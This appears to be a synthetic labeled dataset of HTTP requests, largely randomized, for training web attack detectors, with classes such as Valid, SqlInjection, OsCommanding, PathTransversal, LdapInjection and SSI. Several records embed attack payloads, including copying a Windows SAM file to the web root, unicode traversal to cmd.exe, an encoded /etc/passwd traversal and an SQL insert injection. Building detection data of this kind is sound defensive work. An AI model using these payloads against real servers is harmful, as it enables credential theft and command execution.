User-Agent: 1cnp (eRDiuO@.r; d5@iMwa-Vg; orLOFZVEf@)
UA-CPU: 68000
UA-Disp: 688,983,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1302x7380
Via: FTP/9.1 234.146.152.32, FTP/9.5 www.xtgAib.htm
Transfer-Encoding: compress
Upgrade: 5a1o/5.9, umu/3.5
Warning: 203 www.dmeaU2e.htm "snkasehreMi8RjfNhe" 
X-Forwarded-For: 10.175.216.186
X-Serial-Number: 0347000130099147
----: ------------------
~~~~~: ~~~~~~~~~~~~

ytrptcW6tdiden=58984362&we=ucinrilB&7_PB=;wt4r|%Resock_streamt&ymwbsdioi=63775888&i2T0hdaqh=bseeH

End - Id: 7332
Start - Id: 38154
class: LdapInjection
GET /pkwnotIeeiuu/oemntoormp/TErtywSgoac7ude.css?sivMOM=381&aroawoe=sno%29%28+%7C+%28vsc%3D*%29&aernydektiaoy=%3Bmt&e5evr=95414&thte=00177523&jasEvo=oXLwZ3kaCd&hgdltei=reYj&cXl0=eA6dTnTg6PFO&gyiE=645558&enothydjarrt=s%3Ddhtpasslomftew5t+sform%7E%2F&wOaerotWotolop=G&btzo=Zau%2Bp2gUec&DJ3document_F=79 HTTP/1.1
Host: 83.136.28.18
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e0-meuedapc, y-qhpxahna;q=0.9
Cache-Control: no-transform
Client-ip: 106.203.232.28
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="2"
Date: Fri, 06 Nov 09 03:34:43 UTC
ETag: "A1s@88r@tyXJ610"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Sat, 28 Oct 06 20:40:13 UTC
If-Unmodified-Since: Fri, 27 Feb 09 07:06:25 GMT
If-Match: *
If-None-Match: *
If-Range: "Qg.YAAEF4J7pqRZw"
Max-Forwards: 4856
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: njtdo oiaHAsOe=InaIstei
Range: -232075
Referer: /oyerQd/smkdyl0/featu/trPl5a.rar
TE: gzip,gzip;q=0.4
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.5 (Windows; U; Win98 0.0; iu-nv; rv:0.8.0) Gecko/30718940
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: eys/5.7 www.Ee2qe.js, FTP/2.1 www.nw2e.css, 9.3 www.eonr1lzr.tiff
Transfer-Encoding: gzip
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 967 www.teLieti.js "bUr2" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38154
Start - Id: 42905
class: OsCommanding
POST /idWGE5_rowS/XJLl_NpX8/upsh/eUHI/2ymetaXXZ63.js? HTTP/1.1
Content-Length: 30
Content-Language: fti,a
Content-Encoding: deflate
Content-Location: http://io1ln.de/talxf.php3
Content-MD5: NmkyZmVydGFoMW9lMGNucw==
Content-Type: application/x-www-form-urlencoded
Host: 226.148.148.136
Connection: HeAss
Accept: */*;q=0.2
Accept-Charset: x-mac-hebrew, windows-1253;q=0.3, windows-874;q=0.2, big5;q=0.6, macintosh;q=0.2
Accept-Encoding: gzip;q=0.1, deflate;q=0.9, compress;q=0.4, compress, gzip
Accept-Language: *
Cache-Control: no-store
Cookie2: $Version="59"
Expect: 100-continue
If-Unmodified-Since: Mon, 11 Apr 05 06:06:31 CET
Pragma: dinsis='0t'
Proxy-Authorization: 3ah2n oemomxt=3hsHia2
Authorization: Digest nc=C494d1ce
Referer: /ewntoaof/EeuitD.htm
TE: trailers
User-Agent: 179.145.196.147| copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd
Via: fn8i/6.2 www.6fAtkrer.gif, 0.7 182.227.170.69, 8.0 158.156.156.153
----: ---------------------

wEsVHy=1557&lrosReNhd9r=rleanc

End - Id: 42905
Start - Id: 34060
class: Valid
PUT /waw9whtnndmrd.cgi? HTTP/1.0
Content-Length: 184
Content-Language: A,qeaNtFc,6ncclnbt
Content-Encoding: deflate
Content-Location: http://yeau.biz/arnh8r/teIo8l.php3
Content-MD5: aEVBc2JvOXlzdEluSXlzbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Sep 07 13:19:10 GMT
Last-Modified: Mon, 28 Jan 08 21:06:16 UTC
Host: 88.60.65.19
Connection: close
Accept: video/*, application/rtf;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: h8584-E, ftA-oai;q=0.8, oaiit-sl, odboCei-agtFN;q=0.8, e-ot6snni;q=0.3
Cache-Control: 8=n
Client-ip: 235.32.241.146
Cookie: 8pcosaoeidw=nx i/;toGibnston=c0a$lutemvibap
Cookie2: $Version="527"
Date: Sun, 27 Apr 08 24:47:43 UTC
ETag: W/"vVJSwSv7ZG9Bv3-"
Expect: 100-continue
From: eshil@tpeiae1n.fr
If-Modified-Since: Fri, 26 Nov 04 13:44:51 CET
If-Unmodified-Since: Thu, 30 Dec 04 03:57:59 GMT
If-Match: "NFjfVdrO7fIqm8JT"
If-None-Match: "By.k8-Z..CuYEuyVh"
If-Range: "ymsbpV8@s2Wthzywf"
Max-Forwards: 393
MIME-Version: 8.9
Pragma: b=hItther
Proxy-Authorization: Basic M2E2aXVpZzpzRXJvZmY=
Authorization: ecps sNate=hinE8Ri
Range: 39865-,5-,-58
Referer: http://9awaal.ch/fkh7/atsote/oEn2jT.php
TE: deflate,trailers,chunked
Trailer: User-Agent
User-Agent: eAXw-ne http://www.Msmoyn.st
UA-CPU: x86
UA-Disp: 2533,0787,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 682x2942
Via: HTTP/8.0 61.39.29.23
Transfer-Encoding: compress
Upgrade: qhe6/5.5, Ndaod/1.6, zcbn/9.5, tweeah/0.8, v9imgh/0.4
Warning: 839 136.145.234.240:03 "8eru4Saovlliuyd" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 096002850
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

mrt=gtaoemitorhs&0slvsespomq=utornr&EwhioEa95Hrrka=3AT50khIKDY&ryeslmah=7riarnwsshrwadhr&dkoetenett=t&5rxtwlh4ifan=[@nabg$processing-instructionaur&fyerst3tnntI=>rbihtaccesrmx4

End - Id: 34060
Start - Id: 42338
class: SqlInjection
GET /o0DjLzu6pnYy62iM@I/edlpe0rhayhqwrhhhv/iIvUHFt14Nwgy/9_8Dx@h8dobjectsuk/xmlvJncchVAWPjEiphp/3bb4FJEYvBrbREn1N/yfbQWUM2h2Lu0Yhw7TP/hb/aTYI34@cpZ3D8-Yskzro.css?Soamdr=somiEseErfEp1e&odrhM=ttlikelocation&6nskdE5se=%27%3B+++++insert+++++into++reww2+++++values%28666%2C%27meut%27%2C%27beO%27%2C0xfffff%29&uevlaohrdjxA=enQ3&nvt=ua6ped2s+s2wdwo&eso=p%24anedi HTTP/1.1
Host: 152.32.6.237
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: rs6a-d, doaCx-jms;q=0.1
Cache-Control: only-if-cached
Client-ip: 70.112.181.255
Cookie: C.yFdivhZ=fjIA>eobject %rsdwf<Uldjw;oef=n0;aezgA5aWe=49Greplace
Cookie2: $Version="2"
Date: Tue, 23 Nov 04 12:45:59 CET
ETag: W/"W3Dl8Wik9y5E8q13ewRG"
Expect: 100-continue
From: taa7@n9I9.uk
If-Modified-Since: Thu, 05 Feb 04 05:29:01 GMT
If-Unmodified-Since: Fri, 02 Apr 10 19:23:39 CET
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: *
Max-Forwards: 168
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -183629,81875-7
Referer: http://Hhrt.uk/abfa/RyiHet/e87egein.asmx
TE: gzip;q=0.6
Trailer: Accept-Encoding
User-Agent: Mozilla/1.5 (compatible; 0tto; Linux i586; Shoraaeith; Betcae)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: FTP/2.5 29.147.30.25
Transfer-Encoding: deflate
Upgrade: tkdit/5.2
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 43766358
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42338
Start - Id: 23778
class: Valid
GET /reEeSh/wrinapx5vw/l7_oUbwSdr9beJQ0vr_/ueRETm.ocMZbkDl40Sf/M30JUZ28Pexec/aeiio4et/aNLn3moJ0mQH/64jP9lna7hx/5ELrwSFUL/iig7chEi8io/ao87eaeva72e7.css?tmeaDlnnhet8u=48948&Qts3N=90e&yc9d=225&t3l=+giuvahhtaccest&fdXia_Wfc=+lzra&4ctt=i7z9lziwjH2&UNelhiO=orgttc9hr&HDphpwnYB=735813&ryszjerEss=sonnewherewehnh0t&jcM5s=rlocationhtaccesl&5mdreorve32d=e%5D&ttcf=nue1&mrihristaciee=cex0hevaln1lry%7C&7viiazm1ntqcm=is%2F%2Foir+rl%7Es HTTP/1.1
Host: www.xI7ebihr.ch
Connection: m0tl6nee
Accept: text/*, text/*
Accept-Charset: windows-1255;q=0.0, x-mac-arabic;q=0.2, x-mac-korean;q=0.1, iso-8859-7, x-mac-roman;q=0.2
Accept-Encoding: identity;q=0.2
Accept-Language: otqadt5-gy, Arnlac-oet;q=0.2, S-d;q=0.0
Cache-Control: no-store
Client-ip: 149.198.205.168
Cookie: 6tajeiic=iAouis;rEhlrdTsstrct=lbmetat;Qiform0TS=j5FPev8qcWnv
Cookie2: $Version="99"
Date: Wed, 25 Jun 08 24:24:41 UTC
ETag: "pLul_TzT5B9FDQILN"
Expect: 100-continue
From: yiews@64sy.de
If-Modified-Since: Thu, 22 Oct 09 12:21:59 GMT
If-Unmodified-Since: Mon, 30 May 05 13:31:31 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Feb 07 16:36:40 CET
Max-Forwards: 1211
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWJJZW1mMXRhYURudGFuc1JpZml0bmFpaWhhSWUzYWw=
Authorization: Digest nonce
Range: -9
Referer: /1aoase.pdf
TE: chunked;q=0.2,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.6 (X11; U; Unix 9.0; xo-bs; rv:2.5.6) Gecko/69892633
UA-CPU: 68000
UA-Disp: 3668,047,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 884x6494
Via: 1.4 www.inasen.jpeg
Transfer-Encoding: compress
Upgrade: z9ot/5.3, nmy/4.3, aoiir/1.9, 1h4/2.4
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 599405037
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 23778
Start - Id: 36507
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.rslinlbeoU.it
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ondbeaE4-bne4, natvn6r-e, h-d7hitn, sa2it-iheehf
Cache-Control: only-if-cached
Client-ip: 138.104.69.2
Cookie: shbeh=eaani/I52nes~a;YMCeLcmd=lst@rtesconnectoitfre;outsuelcoh9=HnaRdH]yv;e]uecs6
Cookie2: $Version="1"
Date: Wed, 10 Jun 09 18:29:13 GMT
ETag: W/"XSBTdwWVG7jW_uARV"
Expect: atcEeo
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Mon, 15 Mar 10 05:55:03 UTC
If-Match: *
If-None-Match: "f0hZINOGhvietrIWvi"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: Basic dHJ1STpsU2JicmV4
Range: 560-980083,973913-
Referer: /xTifred/tytewx/yroe/cyes.txt
TE: gzip;q=0.3
Trailer: From
User-Agent: Mozilla/9.4 (X11; U; Open BSD i586 5.1; EP-ih; rv:0.3.9) Gecko/31032615
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/6.6 www.mi6n6.jpg, HTTP/4.1 129.14.130.80
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36507
Start - Id: 46177
class: PathTransversal
GET /aftMp9h-/G3jaynnTsd/eJ5f6Ec/HadminYM0Oe/4q1d_hiTb5_zNg.g4/na_6bBlVfVpl/8ugseeoaes5veeTnsl/efDVyd11HM5/t0Q22QZNL.tj.php?1@fXtML7Ijhomep=sMj&aHhhaChtw=8h5D&zoineaahjctno=20&orh=rIg9p4sNN-u&gisabk8flseTQe3=lAbc%2FAytmp8%7Eetnw&nf7ta=elZyaetcnas&bfnhtibdk8rL6h=sock_stream++ti2arm2qt+a&I9bg7NexecKb1rX=lsUbgm&u7ZprmHKdJ=856035&yaseAGl3doouIs=lyW%5Caln%7Eu&qSROcmed5ebe=%29c%2Fo%3E%5Bu&9ze8dhitid=1925890&K8ihrdmois=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&emiA1=bcprocessing-instructionts&4yuowSnres=formconnect%3A HTTP/1.1
Host: www.ia93lhHm.net:65
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: g-I;q=0.0, rieRreQ-sh;q=0.1, etgp-ivu2u;q=0.8, oa-3iUt, jgeereM-yb5
Cache-Control: max-stale
Client-ip: 200.242.126.46
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="18"
Date: Fri, 31 Mar 06 10:49:35 GMT
ETag: "hgS4mgI8rGzEY4sN"
Expect: 100-continue
From: T6case6b@eeystktA.net
If-Modified-Since: Thu, 09 Feb 06 21:28:50 GMT
If-Unmodified-Since: Wed, 17 Aug 05 04:21:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8267
MIME-Version: 6.1
Pragma: jh1=jkrmell
Proxy-Authorization: NTLM cmVoc1RydHcwRnRyeTlsYWV0dHRUaHpveWtvcmlzZWFvaW55dQ==
Authorization: NTLM d2xwcmVzdGhzbHQ1ZTFPOWlyc3VuaGRuTGxlaGF0dnQyc3RpQWVoeQ==
Range: -423
Referer: http://www.lolrfp.org/sOdsc/ciOs/itmi.rar
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.9 (X11; U; Linux i586 0.2; hn-nn; rv:5.7.1) Gecko/02311698
UA-CPU: x86
UA-Disp: 3301,4753,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 8.3 www.ua2h.png, 8.4 113.142.174.243, 9.5 www.tOe4w.shtml
Transfer-Encoding: compress
Upgrade: amiap/9.1
Warning: 242 166.158.209.31 "osstwt77pxap" "Mon, 09 Mar 09 01:01:39 CET"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46177
Start - Id: 13953
class: Valid
GET /qXv213eUwxYe6VzH/abtetitclLee/TmUYPIR@wL/iDOz6rVzRew/updateZb5yMw3gSDz/Dat0v8XPcopy/unduV2V7Zg5h/MipasswdNJIE/w2Z/tjqNc/yBdcdX_mSk/nBwMKlm9ORT8ubN3D6rL.php3?C7window.openL5P=acy&ilca=5th7aebw&zageaijs6=o9CHCmWPA2Z.&kRsock_streamOtGZUzMusr=bcerj HTTP/1.1
Host: 49.37.212.119
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a5krowtl-h5el, gtohf-eAmei3l;q=0.3, r-os;q=0.2, 3dgmdia-sdiee;q=0.7
Cache-Control: min-fresh=0
Client-ip: 87.204.53.134
Cookie: fT64czfG=fe tbbetweennfr;deoJ2OPvatcGt8e=8790031;etet=esX8t3X;dslmeamBssifb=xiiohfcrmelg3tg;n3ergno=jyn
Cookie2: $Version="16"
Date: Fri, 01 Dec 06 21:08:53 CET
ETag: "W6cOlf_yqJ64Fb."
Expect: efbid
From: oalearnr@ntEfqd.fr
If-Modified-Since: Wed, 06 Oct 04 13:58:31 GMT
If-Unmodified-Since: Mon, 22 Dec 08 04:42:18 UTC
If-Match: *
If-None-Match: "-DH1ACLE_B9UuEU@VZ0b"
If-Range: *
Max-Forwards: 02
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: snrqoV s1ss=Benjeh4e
Authorization: Basic ZWN0ZHRvd2w6ZWNSdDZv
Range: 4-17952,40583-6085
Referer: http://www.lt9unueF.cz/rjUN.rar
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 5.4; 3i-rn; rv:8.1.6) Gecko/00033394
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: uiS9e/6.0 www.aeeohhW.html, i7ktml/1.7 177.192.255.158
Transfer-Encoding: hbora; itr9rr2R=hnoi
Upgrade: nehtZ/1.7, Etrl/3.6, Qlo6i/7.7, jnbA/3.0
Warning: 875 102.40.224.81 "as0anpoLos" "Tue, 02 May 06 13:35:17 UTC"
X-Forwarded-For: 222.27.179.251
X-Serial-Number: 5967398849780
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13953
Start - Id: 39373
class: SSI
GET /nkI5-Gp/nxH42QfMy2/tx8aowsntaurmytneThe.msf?i9p7it9g=35&tyft=%3C%21--%23email+fromhost%3D%22www.deaTfo.com%22+tohost%3D%22mailbox.dis.com%22+message%3D%22idjiw2+ecNpuI+Etlru+o3Xt6e%22+fromaddress%3D%221nniZ.com%22+toaddress%3D%22ceo.7e.com%22+subject%3D%22eg%22+sender%3D%22eh7e.com%22+replyto%3D%22tLti2r.com%22+cc%3D%22i5c%22+inreplyto%3D%22vhesi+tno+loa%22+id%3D%22yrmail%22+--%3E&siaelelo6aasac=55675&En=p12Ma+eto&sijduectexetekH=hdlib4s%40ilxtermiwhererolibpstdin+at&aeposeshop0aor=eaos7xaotoRtu3&drot4L=uw%3ETzswnNShtpass&hj=sv3nDjq&nnsie4t=%29+oshutdown&ifhel=677&sm46yz=+wgetgshg0pe&RS=l&fjnxMmm9ajyrMm=63&tjd7ie4q=%3Bj%5B9sN3R+lch%3F&-Nd5=Rl HTTP/1.0
Host: 190.138.212.172
Connection: close
Accept: image/*;q=0.9, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: jrprtaa-bii;q=0.1, tr-U2r;q=0.3, y-aa
Cache-Control: no-cache
Client-ip: 19.66.228.157
Cookie: xhonfh3lWa=owQGP2rYXL7o
Cookie2: $Version="493"
Date: Thu, 19 Feb 04 24:58:57 UTC
ETag: W/"V0rv.@Ny6ITSV709evc"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 16 May 08 17:59:22 GMT
If-Unmodified-Since: Sun, 01 May 05 07:58:35 CET
If-Match: "p1yHeFT9Dtrw-Mj"
If-None-Match: "ItNHGv2j75thLlL5-"
If-Range: Sat, 28 Feb 04 08:18:45 GMT
Max-Forwards: 7
MIME-Version: 3.7
Pragma: At=lh
Proxy-Authorization: Basic em5ldHNsZTplTXRuT3Jvdg==
Authorization: Digest nonce
Range: -7403,569103-
Referer: /Qgmtte/aInqe4/reliioe7/s6hbb.mspx
TE: chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: riiCFents
UA-CPU: 68000
UA-Disp: 939,8855,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3402x217
Via: 9.8 91.2.152.197, haroe/1.8 146.171.90.74, FTP/6.0 www.fslhrtal.htm:92215
Transfer-Encoding: identity
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 190 47.240.214.57 "eTmefeexEnteh0llLor" "Fri, 17 Feb 06 05:54:12 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 687226920
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39373
Start - Id: 16685
class: Valid
GET /e8Gyaf/iXl2HDQy1sJ/tImotLRSS1/il@y_xcNy/8GPn/tzJRMB@Am@mgfjc@gy/hBezMjoXvHy_09Oo-J/nf_@WeOmctAh.pl?ohtleboUsateatq=h9k9la&effrdn=10&sO=+esslghea+naS9rf&7woet1xrccp2izo=30999&JzxmlUPcAh=i2esc7ttaCtncai&einEfndygnvehw=trw4e&s25Koau2=02&rp9na73jO=tztueilri0o HTTP/1.0
Host: www.egsdt.st
Connection: close
Accept: audio/*, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 146.40.27.106
Cookie: deletepcPK=S=;4oDashukzektK3=73171;sz63Setc86=9i1w_vvvXhv4;lnvOuglsrhqcmE=v;8Drxbx@Ex=3262;sreAetkfdehSe=saEa5 
Cookie2: $Version="672"
Date: Mon, 29 Mar 10 12:12:26 CET
ETag: "VP_XM1alKh8CZs."
Expect: BSmim
From: noedlreb@rlhth.be
If-Modified-Since: Wed, 27 Apr 05 19:09:19 GMT
If-Unmodified-Since: Fri, 12 Dec 08 05:20:35 GMT
If-Match: "82-MIdU65zu.ayQlAMU"
If-None-Match: *
If-Range: "WwstyyvtXCQLFWyL2"
Max-Forwards: 776
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: nc0yi tCyenTo=kspeuliz
Range: 66423-,495551-51481,-752903
Referer: http://www.onuh.ch/tjhaeyi/stsnge/rhcAnB1O/acrs.msf
TE: deflate;q=0.6
Trailer: TE
User-Agent: edaEe6a (ibpFOzu; p-Cij8Y; av.YYlA)
UA-CPU: 68000
UA-Disp: 7604,2520,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6609x7402
Via: 3ajt/4.9 www.snoe2g7i.gif, 3.3 www.wees0.png, 0.3 62.110.107.106
Transfer-Encoding: gzip
Upgrade: topnf/0.4, nils/4.5
Warning: 433 www.lsruibo.js "n4idus" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 93584003458
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16685
Start - Id: 9260
class: Valid
GET /9TPEaz26bl4T_avb/srkmninpnfres.jpeg?thXnhoie4hnA=81319328&rinaegfRtcnfail=sWGLme-0eo&replaceLnLdivXdNJ=dIwow&-L@XL3=1318&LfRFTN-4nh=0zn1div2mytaerbgsounde%2Bt%2BEGe&Ne0fu5DHfe4=b39NOnqfT7Cn HTTP/1.0
Host: www.eiap0Sp.org
Connection: dtr3
Accept: video/*;q=0.9
Accept-Charset: x-mac-chinesesimp, iso-2022-jp, x-mac-korean;q=0.6, utf-8;q=0.5, x-mac-korean
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 10.199.28.132
Cookie: hkd7atid=ny2Maasmett;syed=U;-;itSoceht=0;ngohein=r2UsS;tytlbc5nlfgnbeV=lqm0ierhaHodt;haq0nhtaEurnad=3a@window.open
Cookie2: $Version="9"
Date: Sun, 22 Jun 08 07:52:25 CET
ETag: W/"jbncgDaLCEBNdHk1-AJ"
Expect: 100-continue
From: odmn5jk@dalmleb.ch
If-Modified-Since: Tue, 12 Sep 06 17:18:08 CET
If-Unmodified-Since: Sat, 09 May 09 18:31:45 UTC
If-Match: *
If-None-Match: "@bh0vsaN33Hg@HklFWxK"
If-Range: Tue, 16 Nov 04 01:04:08 UTC
Max-Forwards: 317
MIME-Version: 4.6
Pragma: aade='ftain'
Proxy-Authorization: NTLM ZWdkc2hvVGhIc0U4ZWhhYWNlc2VhZWJsbkF0c25vaG91
Authorization: neofc er5enlra=tieenou
Range: 30-703,-64,-521
Referer: http://4aod76cd.de/dj5y/IJer/ebnil/scnhh.asp
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Def0s (oewhYgbX3)
UA-CPU: 68000
UA-Disp: 2373,285,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 476x394
Via: FTP/2.3 www.eeh0ptia.gif:9, HTTP/4.7 118.57.133.179
Transfer-Encoding: identity
Upgrade: te6hij/6.9, n6aen/3.6, ae9/5.4, c8eog/3.3, hbdo/6.2
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 38374
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9260
Start - Id: 17490
class: Valid
GET /neimIEae9ilu7nO/dJ6null1b/-tF/tmpdT.y@s/3h6/nbgEfWVQ/rsnohstg/eBais3aremnEor.msf?net=liJ8-&r4tcaY9ewFd=atwtt6flOgatM8tS&earuS=8nqttaiapkte&tpEoee=3542984558&tAieahj=2&rrhdo=7osna8tswy&ocMcugtvhlsAmh=4 HTTP/1.1
Host: www.id3ytso83.be
Connection: keep-alive
Accept: video/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 78.87.38.252
Cookie: oieiyqon=52878;shifossb1rmare=ooftpy;bovesas=76Wiv;7netcatD3j=1580;nqdimSgs=;]
Cookie2: $Version="264"
Date: Sun, 05 Apr 09 05:16:41 CET
ETag: "VfDQeglA-OWCeNU4sa"
Expect: Entgamhr
From: aqaarte@masstqj.net
If-Modified-Since: Sun, 26 Jun 05 04:48:08 CET
If-Unmodified-Since: Tue, 31 Oct 06 10:55:35 CET
If-Match: "hn7mNEyqBLH3EEkD-3"
If-None-Match: *
If-Range: "Wcm4S6IpWvfhA4G7U"
Max-Forwards: 27
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nc=4178AAc2
Range: 6-05,-0890
Referer: http://www.frfbynfn.fr/inle3s.mpeg
TE: trailers,deflate,deflate;q=0.3
Trailer: Expect
User-Agent: Mozilla/0.3 (X11; U; SunOS sun4u 5.8; sI-it; rv:0.7.5) Gecko/49529719
UA-CPU: StrongARM
UA-Disp: 5103,184,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 682x5954
Via: 7.7 43.124.103.169:61832
Transfer-Encoding: deflate
Upgrade: mS8/8.1, rssen/7.0, 8Wjew/3.0, tFw4yq/8.9, kkBk/0.0
Warning: 215 www.knhetdi.shtml "netciN" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17490
Start - Id: 38851
class: LdapInjection
GET /oi/eaeovfavhdeimcgeaa/neethC/admine7KMz-ludwnetcatQdiv/YX7S5/soctteulbe/Sceerar3noeR2hbab7s/niIpgea.php3?2eans=pvseatlursbnwnlo&md=5868895&telnetUoLkUdq@7sM=22618&me=3&a7bucg=rveM&aeeWokas6gg89d=528328&8tviptofo=ppXz5rVTwgZ&rao2iycutdltu=wrAa%29%28+%7C+%28Edn%3D*%29&XmXX4=tehmerw&78E8eeRyes=680&GbMxjH=mhrnatmint1lseo&eat8meba09i=1983283772&lieuxPwi6wiHx=138&o6t=ot&acx=hRiyfb%40o HTTP/1.1
Host: www.hisur.de
Connection: Gndneiak
Accept: text/xml;q=0.4, application/*;q=0.5
Accept-Charset: cp-950;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 149.133.119.108
Cookie: _oUauPeMDUR=41
Cookie2: $Version="36"
Date: Wed, 07 Apr 04 05:19:33 CET
ETag: W/"q@gwKxzEx8Iq1.Wec@y"
Expect: beeepata=O503do;rmagetie
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Mon, 03 Aug 09 06:33:40 GMT
If-Unmodified-Since: Mon, 14 Apr 08 06:53:13 UTC
If-Match: "MFf2_gMe3wcMlaH.Obz"
If-None-Match: "@nXv3OGmTIP_@ISF56U"
If-Range: *
Max-Forwards: 1
MIME-Version: 3.5
Pragma: huo='hjr'
Proxy-Authorization: Digest nonce
Authorization: Digest username="gudxrlz"
Range: -390702,-162,16550-
Referer: http://www.azhx4l.uk/Eae2n/arnhSne/etsoyup9/Ap2ona.mpeg
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 8.8; qd-nl; rv:0.4.9) Gecko/69319193
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9479x714
Via: 3.2 128.222.169.209
Transfer-Encoding: rart; foehn=TheooNs
Upgrade: O88/7.9, ieosN/1.3, eTtno/0.5, aah/4.6
